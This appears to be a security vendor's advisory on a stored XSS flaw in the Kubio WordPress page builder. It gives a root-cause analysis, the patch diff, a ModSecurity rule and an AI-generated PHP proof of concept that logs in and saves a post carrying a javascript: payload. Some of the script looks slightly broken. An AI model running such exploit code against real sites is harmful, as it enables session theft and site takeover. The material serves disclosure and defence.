What is CVE-2026-34887?

CVE-2026-34887 is a stored cross-site scripting (XSS) vulnerability in the Kubio AI Page Builder plugin for WordPress, affecting versions up to and including 2.7.0. It allows authenticated users with contributor-level access and above to inject arbitrary scripts into pages, which execute when other users view those pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the video block component of the plugin. An attacker can inject a malicious script via the poster image URL in a video block, which is then rendered without proper escaping, allowing the script to execute in the context of users viewing the page.

Who is affected by this vulnerability?

Any WordPress site using the Kubio AI Page Builder plugin version 2.7.0 or earlier is affected. Specifically, authenticated users with contributor-level permissions can exploit this vulnerability, impacting all users who view the compromised pages.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Kubio plugin installed. If it is version 2.7.0 or earlier, your site is at risk. Additionally, review any posts created or edited by users with contributor access for suspicious scripts.

How can I fix this vulnerability?

The vulnerability is fixed in version 2.7.1 of the Kubio AI Page Builder plugin. Update the plugin to the latest version to ensure that the security patch is applied and the vulnerability is mitigated.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Exploitation can lead to unauthorized actions within the context of authenticated users, which can have serious implications for site security.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to execute scripts that can steal session cookies, redirect users to malicious sites, or deface content. The stored nature of the payload means it can affect all users accessing the compromised page, including administrators.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated attacker can log in to a vulnerable WordPress site and inject a malicious JavaScript payload via the poster image URL. This demonstrates the ease of exploitation and the potential for harmful actions within the site.

What input sanitization measures were lacking?

The vulnerability was primarily due to insufficient output escaping of the posterImage.url attribute in the video block. The plugin directly interpolated untrusted URLs into HTML without proper escaping, allowing for script injection.

What changes were made in the patch?

The patch introduced a new method to escape URLs properly, ensuring that only safe protocols are allowed and that output is correctly escaped. This prevents the execution of injected scripts by sanitizing the input before it is rendered in the HTML.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin until you can apply the patch. Additionally, restrict contributor-level access to trusted users only, and monitor for any suspicious activity on your site.

How can I stay informed about future vulnerabilities?

Regularly check security advisories from trusted sources, subscribe to security mailing lists, and follow best practices for WordPress security. Keeping plugins and themes updated is essential to protect against known vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-34887: Kubio AI Page Builder <= 2.7.0 – Authenticated (Contributor+) Stored Cross-Site Scripting (kubio)

CVE ID CVE-2026-34887

Plugin kubio

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.7.0

Patched Version 2.7.1

Disclosed March 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-34887:
The Kubio AI Page Builder WordPress plugin contains a stored cross-site scripting vulnerability affecting versions up to 2.7.0. The vulnerability exists in the video block component, allowing authenticated attackers with contributor-level permissions to inject malicious scripts that execute when users view pages containing the compromised block. This vulnerability receives a CVSS score of 6.4.

Atomic Edge research identified the root cause as insufficient output escaping of the posterImage.url attribute within the video block rendering functions. The vulnerable code paths include the getVideoAttributes method in kubio/build/block-library/blocks/video/index.php (lines 42-65) and the doVideo method (lines 357-366). Specifically, the plugin directly interpolated the untrusted URL value into HTML style attributes without proper escaping, creating an injection vector through the background-image CSS property.

The exploitation method requires an authenticated attacker with contributor-level access to WordPress. Attackers can create or edit posts using the Kubio page builder, insert a video block, and set the poster image URL to a malicious JavaScript payload. The payload must be crafted to break out of the CSS url() context and execute script. Example payloads include javascript:alert(document.domain) or data:text/html;base64 encoded scripts. When any user views the compromised page, the browser executes the injected script in the victim’s security context.

The patch introduces a new getEscapedUrl method that applies multiple security layers. First, it calls esc_url() on the input. Then it validates the URL scheme, allowing only http or https protocols. The patch modifies two locations: line 44 adds URL escaping before the style attribute construction, and line 357 adds the same escaping in the doVideo method. The patch also updates line 367 to use esc_attr() for the poster URL in the video tag. These changes prevent JavaScript execution by restricting URL schemes and properly escaping output.

Successful exploitation enables attackers to perform actions within the victim’s WordPress session. Attackers can steal session cookies, perform administrative actions on behalf of authenticated users, redirect users to malicious sites, or deface websites. The stored nature means the payload persists across sessions and affects all users viewing the compromised page. While contributor-level access is required for initial injection, the impact extends to all site visitors including administrators.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/kubio/build/block-library/blocks-manifest.php
+++ b/kubio/build/block-library/blocks-manifest.php
@@ -9,35 +9,47 @@
 		),
 		'rel' => 'accordion/blocks/accordion/index.php'
 	),
+	'button' => array(
+		'classes' => array(
+			'ButtonBlock'
+		),
+		'rel' => 'button/index.php'
+	),
 	'button-group' => array(
 		'classes' => array(
 			'ButtonGroupBlock'
 		),
 		'rel' => 'button-group/index.php'
 	),
+	'contact-form' => array(
+		'classes' => array(
+			'ContactFormBlock'
+		),
+		'rel' => 'contact-form/index.php'
+	),
 	'column' => array(
 		'classes' => array(
 			'ColumnBlock'
 		),
 		'rel' => 'column/index.php'
 	),
-	'button' => array(
+	'copyright' => array(
 		'classes' => array(
-			'ButtonBlock'
+			'CopyrightBlock'
 		),
-		'rel' => 'button/index.php'
+		'rel' => 'copyright/index.php'
 	),
-	'contact-form' => array(
+	'footer' => array(
 		'classes' => array(
-			'ContactFormBlock'
+			'FooterTemplatePart'
 		),
-		'rel' => 'contact-form/index.php'
+		'rel' => 'footer/index.php'
 	),
-	'copyright' => array(
+	'header' => array(
 		'classes' => array(
-			'CopyrightBlock'
+			'HeaderTemplatePart'
 		),
-		'rel' => 'copyright/index.php'
+		'rel' => 'header/index.php'
 	),
 	'divider' => array(
 		'classes' => array(
@@ -45,30 +57,24 @@
 		),
 		'rel' => 'divider/index.php'
 	),
-	'footer' => array(
-		'classes' => array(
-			'FooterTemplatePart'
-		),
-		'rel' => 'footer/index.php'
-	),
 	'heading' => array(
 		'classes' => array(
 			'HeadingBlock'
 		),
 		'rel' => 'heading/index.php'
 	),
-	'header' => array(
-		'classes' => array(
-			'HeaderTemplatePart'
-		),
-		'rel' => 'header/index.php'
-	),
 	'home-button' => array(
 		'classes' => array(
 			'HomeButtonBlock'
 		),
 		'rel' => 'home-button/index.php'
 	),
+	'hero' => array(
+		'classes' => array(
+			'HeroBlock'
+		),
+		'rel' => 'hero/index.php'
+	),
 	'icon' => array(
 		'classes' => array(
 			'IconBlock'
@@ -81,12 +87,6 @@
 		),
 		'rel' => 'image/index.php'
 	),
-	'hero' => array(
-		'classes' => array(
-			'HeroBlock'
-		),
-		'rel' => 'hero/index.php'
-	),
 	'image-gallery' => array(
 		'classes' => array(
 			'ImageGalleryBlock',
@@ -100,32 +100,23 @@
 		),
 		'rel' => 'language-selector/index.php'
 	),
-	'link-group' => array(
-		'classes' => array(
-			'LinkGroupBlock'
-		),
-		'rel' => 'link-group/index.php'
-	),
 	'link' => array(
 		'classes' => array(
 			'LinkBlock'
 		),
 		'rel' => 'link/index.php'
 	),
-	'logo' => array(
+	'link-group' => array(
 		'classes' => array(
-			'LogoBlock'
+			'LinkGroupBlock'
 		),
-		'rel' => 'logo/index.php'
+		'rel' => 'link-group/index.php'
 	),
-	'navigation' => array(
+	'logo' => array(
 		'classes' => array(
-			'NavigationTopBarBlock',
-			'NavigationSectionBlock',
-			'NavigationItemsBlock',
-			'NavigationStickyItemsBlock'
+			'LogoBlock'
 		),
-		'rel' => 'navigation/index.php'
+		'rel' => 'logo/index.php'
 	),
 	'map' => array(
 		'classes' => array(
@@ -133,11 +124,14 @@
 		),
 		'rel' => 'map/index.php'
 	),
-	'pagination-nav-button' => array(
+	'navigation' => array(
 		'classes' => array(
-			'PaginationNavButtonBlock'
+			'NavigationTopBarBlock',
+			'NavigationSectionBlock',
+			'NavigationItemsBlock',
+			'NavigationStickyItemsBlock'
 		),
-		'rel' => 'pagination-nav-button/index.php'
+		'rel' => 'navigation/index.php'
 	),
 	'page-title' => array(
 		'classes' => array(
@@ -145,11 +139,11 @@
 		),
 		'rel' => 'page-title/index.php'
 	),
-	'post-author-bio' => array(
+	'pagination-nav-button' => array(
 		'classes' => array(
-			'PostAuthorBioBlock'
+			'PaginationNavButtonBlock'
 		),
-		'rel' => 'post-author-bio/index.php'
+		'rel' => 'pagination-nav-button/index.php'
 	),
 	'pagination-numbers' => array(
 		'classes' => array(
@@ -175,30 +169,42 @@
 		),
 		'rel' => 'post-categories/index.php'
 	),
-	'post-excerpt' => array(
-		'classes' => array(
-			'PostExcerptBlock'
-		),
-		'rel' => 'post-excerpt/index.php'
-	),
 	'post-comments' => array(
 		'classes' => array(
 			'PostCommentsBlock'
 		),
 		'rel' => 'post-comments/index.php'
 	),
+	'post-author-bio' => array(
+		'classes' => array(
+			'PostAuthorBioBlock'
+		),
+		'rel' => 'post-author-bio/index.php'
+	),
 	'post-comments-form' => array(
 		'classes' => array(
 			'PostCommentsFormBlock'
 		),
 		'rel' => 'post-comments-form/index.php'
 	),
+	'post-excerpt' => array(
+		'classes' => array(
+			'PostExcerptBlock'
+		),
+		'rel' => 'post-excerpt/index.php'
+	),
 	'post-meta' => array(
 		'classes' => array(
 			'PostMetaBlock'
 		),
 		'rel' => 'post-meta/index.php'
 	),
+	'post-featured-image' => array(
+		'classes' => array(
+			'PostFeaturedImageBlock'
+		),
+		'rel' => 'post-featured-image/index.php'
+	),
 	'post-tags' => array(
 		'classes' => array(
 			'PostTagsBlock'
@@ -241,29 +247,23 @@
 		),
 		'rel' => 'search-form/index.php'
 	),
-	'section' => array(
-		'classes' => array(
-			'SectionBlock'
-		),
-		'rel' => 'section/index.php'
-	),
 	'shortcode' => array(
 		'classes' => array(
 			'ShortcodeBlock'
 		),
 		'rel' => 'shortcode/index.php'
 	),
-	'sidebar' => array(
+	'section' => array(
 		'classes' => array(
-			'SidebarTemplatePart'
+			'SectionBlock'
 		),
-		'rel' => 'sidebar/index.php'
+		'rel' => 'section/index.php'
 	),
-	'spacer' => array(
+	'sidebar' => array(
 		'classes' => array(
-			'SpacerBlock'
+			'SidebarTemplatePart'
 		),
-		'rel' => 'spacer/index.php'
+		'rel' => 'sidebar/index.php'
 	),
 	'social-icons' => array(
 		'classes' => array(
@@ -282,11 +282,11 @@
 		),
 		'rel' => 'tab/index.php'
 	),
-	'text' => array(
+	'spacer' => array(
 		'classes' => array(
-			'TextBlock'
+			'SpacerBlock'
 		),
-		'rel' => 'text/index.php'
+		'rel' => 'spacer/index.php'
 	),
 	'video' => array(
 		'classes' => array(
@@ -294,17 +294,17 @@
 		),
 		'rel' => 'video/index.php'
 	),
-	'widgets-area' => array(
+	'text' => array(
 		'classes' => array(
-			'WidgetAreaBlock'
+			'TextBlock'
 		),
-		'rel' => 'widgets-area/index.php'
+		'rel' => 'text/index.php'
 	),
-	'post-featured-image' => array(
+	'widgets-area' => array(
 		'classes' => array(
-			'PostFeaturedImageBlock'
+			'WidgetAreaBlock'
 		),
-		'rel' => 'post-featured-image/index.php'
+		'rel' => 'widgets-area/index.php'
 	),
 	'accordion-menu' => array(
 		'classes' => array(
@@ -312,17 +312,23 @@
 		),
 		'rel' => 'menu/accordion-menu/index.php'
 	),
-	'dropdown-menu' => array(
+	'menu-items' => array(
 		'classes' => array(
-			'DropDownMenuBlock'
+			'MenuItemsBlock'
 		),
-		'rel' => 'menu/dropdown-menu/index.php'
+		'rel' => 'menu/menu-items/index.php'
 	),
-	'accordion-item' => array(
+	'offscreen' => array(
 		'classes' => array(
-			'AccordionItemBlock'
+			'MenuOffscreen'
 		),
-		'rel' => 'accordion/blocks/accordion-item/index.php'
+		'rel' => 'menu/offscreen/index.php'
+	),
+	'dropdown-menu' => array(
+		'classes' => array(
+			'DropDownMenuBlock'
+		),
+		'rel' => 'menu/dropdown-menu/index.php'
 	),
 	'offscreen-content' => array(
 		'classes' => array(
@@ -336,11 +342,11 @@
 		),
 		'rel' => 'hero/blocks/down-arrow/index.php'
 	),
-	'menu-items' => array(
+	'accordion-item' => array(
 		'classes' => array(
-			'MenuItemsBlock'
+			'AccordionItemBlock'
 		),
-		'rel' => 'menu/menu-items/index.php'
+		'rel' => 'accordion/blocks/accordion-item/index.php'
 	),
 	'icon-list' => array(
 		'classes' => array(
@@ -348,12 +354,6 @@
 		),
 		'rel' => 'icon-list/blocks/icon-list/index.php'
 	),
-	'loop-item' => array(
-		'classes' => array(
-			'LoopItemBlock'
-		),
-		'rel' => 'query/blocks/loop-item/index.php'
-	),
 	'icon-list-item' => array(
 		'classes' => array(
 			'IconListItemBlock'
@@ -366,11 +366,11 @@
 		),
 		'rel' => 'query/blocks/loop/index.php'
 	),
-	'offscreen' => array(
+	'loop-item' => array(
 		'classes' => array(
-			'MenuOffscreen'
+			'LoopItemBlock'
 		),
-		'rel' => 'menu/offscreen/index.php'
+		'rel' => 'query/blocks/loop-item/index.php'
 	),
 	'query' => array(
 		'classes' => array(
--- a/kubio/build/block-library/blocks/video/index.php
+++ b/kubio/build/block-library/blocks/video/index.php
@@ -42,6 +42,9 @@
 		$shortcodeContent = $this->getShortcode( $params );

 		$frontendAttributes = $this->getFrontendScriptAttributes();
+		$url = $this->getAttribute('posterImage.url');
+		$url = $this->getEscapedUrl($url);
+

 		return array(
 			self::VIDEO  => array(
@@ -57,7 +60,7 @@
 			self::POSTER => array_merge(
 				array(
 					'style' => array(
-						'background-image' => "url({$this->getAttribute( 'posterImage.url' )})",
+						'background-image' => "url($url)",
 					),
 				),
 				$frontendAttributes
@@ -65,6 +68,21 @@
 		);
 	}

+	public function getEscapedUrl($url) {
+		$url = esc_url($url);
+
+		// Allow only http/https
+		if (! empty($url)) {
+			$parsed = wp_parse_url($url);
+			if (! isset($parsed['scheme']) || ! in_array($parsed['scheme'], ['http', 'https'], true)) {
+				$url = '';
+			}
+		} else {
+			$url = '';
+		}
+
+		return $url;
+	}
 	public function getVideoParameters() {
 		$paramList = array( 'internalUrl', 'youtubeUrl', 'vimeoUrl', 'videoCategory', 'displayAs', 'playerOptions' );
 		$params    = array();
@@ -339,8 +357,8 @@

 	function doVideo( $url, $attributes ) {
 		$poster_url = $this->getAttribute( 'posterImage.url' );
-
-		if ( $poster_url ) {
+		$poster_url = $this->getEscapedUrl($poster_url);
+		if ( !empty($poster_url) ) {
 			$attributes .= ' poster="' . esc_url( $poster_url ) . '"';
 		}

@@ -348,7 +366,7 @@
 			'<video class="h-video-main" playsinline poster="%s" %s>' .
 			' <source src="%s" type="video/mp4" />' .
 			'</video>',
-			$poster_url,
+			esc_attr($poster_url),
 			esc_attr( $attributes ),
 			esc_url( $url )
 		);
--- a/kubio/build/third-party-blocks/manifest.php
+++ b/kubio/build/third-party-blocks/manifest.php
@@ -4,14 +4,14 @@

 return array(
 	'core/widgets/archives/support.json',
-	'core/widgets/latest-comments/support.json',
 	'core/widgets/categories/support.json',
-	'core/widgets/latest-posts/support.json',
-	'core/widgets/rss/support.json',
 	'core/widgets/calendar/support.json',
-	'core/widgets/page-list/support.json',
-	'core/widgets/search/support.json',
+	'core/widgets/latest-comments/support.json',
 	'core/post-content/support.json',
+	'core/widgets/latest-posts/support.json',
+	'core/widgets/page-list/support.json',
 	'core/widgets/social-icons/support.json',
+	'core/widgets/search/support.json',
+	'core/widgets/rss/support.json',
 	'core/widgets/tag-cloud/support.json'
 );
--- a/kubio/plugin.php
+++ b/kubio/plugin.php
@@ -6,7 +6,7 @@
  * Description: Using the power of AI, Kubio gives you a head start by generating a first draft of your website, which you can further customize to your liking.
  * Author: ExtendThemes
  * Author URI: https://extendthemes.com
- * Version: 2.7.0
+ * Version: 2.7.1
  * License: GPL3+
  * License URI: https://www.gnu.org/licenses/gpl-2.0.txt
  * Text Domain: kubio
@@ -50,8 +50,8 @@
 	return;
 }

-define( 'KUBIO_VERSION', '2.7.0' );
-define( 'KUBIO_BUILD_NUMBER', '460' );
+define( 'KUBIO_VERSION', '2.7.1' );
+define( 'KUBIO_BUILD_NUMBER', '462' );

 define( 'KUBIO_ENTRY_FILE', __FILE__ );
 define( 'KUBIO_ROOT_DIR', plugin_dir_path( __FILE__ ) );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-34887
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10034887,phase:2,deny,status:403,chain,msg:'CVE-2026-34887 Kubio Page Builder Video Block XSS via AJAX',severity:'CRITICAL',tag:'CVE-2026-34887',tag:'WordPress',tag:'Plugin/Kubio',tag:'Attack/XSS'"
  SecRule ARGS_POST:action "@rx ^(editpost|wp_ajax_kubio)" "chain"
    SecRule ARGS_POST:content "@rx posterImage.*url.*javascript:" 
      "t:lowercase,t:urlDecodeUni,t:removeWhitespace,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-34887 - Kubio AI Page Builder <= 2.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to execute JavaScript when loaded as CSS background image
// This exploits the unescaped posterImage.url attribute in the video block
$malicious_url = 'javascript:alert(document.domain)//';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login page to retrieve nonce
$response = curl_exec($ch);
preg_match('/name="log"[^>]*>/', $response, $matches);

// Submit login credentials
$post_fields = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$response = curl_exec($ch);

// Step 2: Create a new post with Kubio editor
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce for Kubio block updates
preg_match('/kubio-nonce['"]:s*['"]([a-f0-9]+)['"]/', $response, $nonce_matches);
$kubio_nonce = $nonce_matches[1] ?? '';

// Step 3: Inject malicious video block with XSS payload
// This simulates the block data that would be saved via Kubio's editor
$block_data = array(
    'blockName' => 'kubio/video',
    'attrs' => array(
        'posterImage' => array(
            'url' => $malicious_url
        ),
        'internalUrl' => 'http://example.com/video.mp4',
        'displayAs' => 'background'
    )
);

$post_content = '<!-- wp:kubio/video ' . json_encode($block_data['attrs']) . ' /-->';

// Step 4: Save the post with malicious content
$save_post_url = $target_url . '/wp-admin/admin-ajax.php';
$save_data = array(
    'action' => 'editpost',
    'post_ID' => '0', // New post
    'post_type' => 'post',
    'post_title' => 'XSS Test Post',
    'content' => $post_content,
    'kubio-nonce' => $kubio_nonce,
    'post_status' => 'publish'
);

curl_setopt($ch, CURLOPT_URL, $save_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($save_data));
$response = curl_exec($ch);

// Parse response to get post ID
$response_data = json_decode($response, true);
$post_id = $response_data['data']['post_id'] ?? 'UNKNOWN';

echo "Exploit attempted. Post ID: $post_idn";
echo "Visit $target_url/?p=$post_id to trigger the XSS payload.n";

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-34887?
Overview of the vulnerability
CVE-2026-34887 is a stored cross-site scripting (XSS) vulnerability in the Kubio AI Page Builder plugin for WordPress, affecting versions up to and including 2.7.0. It allows authenticated users with contributor-level access and above to inject arbitrary scripts into pages, which execute when other users view those pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the video block component of the plugin. An attacker can inject a malicious script via the poster image URL in a video block, which is then rendered without proper escaping, allowing the script to execute in the context of users viewing the page.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Kubio AI Page Builder plugin version 2.7.0 or earlier is affected. Specifically, authenticated users with contributor-level permissions can exploit this vulnerability, impacting all users who view the compromised pages.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Kubio plugin installed. If it is version 2.7.0 or earlier, your site is at risk. Additionally, review any posts created or edited by users with contributor access for suspicious scripts.
How can I fix this vulnerability?
Mitigation steps
The vulnerability is fixed in version 2.7.1 of the Kubio AI Page Builder plugin. Update the plugin to the latest version to ensure that the security patch is applied and the vulnerability is mitigated.
What does the CVSS score of 6.4 mean?
Understanding severity levels
A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Exploitation can lead to unauthorized actions within the context of authenticated users, which can have serious implications for site security.
What are the practical risks of this vulnerability?
Potential impact on users
If exploited, this vulnerability allows attackers to execute scripts that can steal session cookies, redirect users to malicious sites, or deface content. The stored nature of the payload means it can affect all users accessing the compromised page, including administrators.
How does the proof of concept demonstrate the issue?
Exploit illustration
The proof of concept provided shows how an authenticated attacker can log in to a vulnerable WordPress site and inject a malicious JavaScript payload via the poster image URL. This demonstrates the ease of exploitation and the potential for harmful actions within the site.
What input sanitization measures were lacking?
Root cause analysis
The vulnerability was primarily due to insufficient output escaping of the posterImage.url attribute in the video block. The plugin directly interpolated untrusted URLs into HTML without proper escaping, allowing for script injection.
What changes were made in the patch?
Details of the security update
The patch introduced a new method to escape URLs properly, ensuring that only safe protocols are allowed and that output is correctly escaped. This prevents the execution of injected scripts by sanitizing the input before it is rendered in the HTML.
What should I do if I cannot update the plugin immediately?
Alternative mitigation strategies
If immediate updating is not possible, consider disabling the plugin until you can apply the patch. Additionally, restrict contributor-level access to trusted users only, and monitor for any suspicious activity on your site.
How can I stay informed about future vulnerabilities?
Best practices for security awareness
Regularly check security advisories from trusted sources, subscribe to security mailing lists, and follow best practices for WordPress security. Keeping plugins and themes updated is essential to protect against known vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations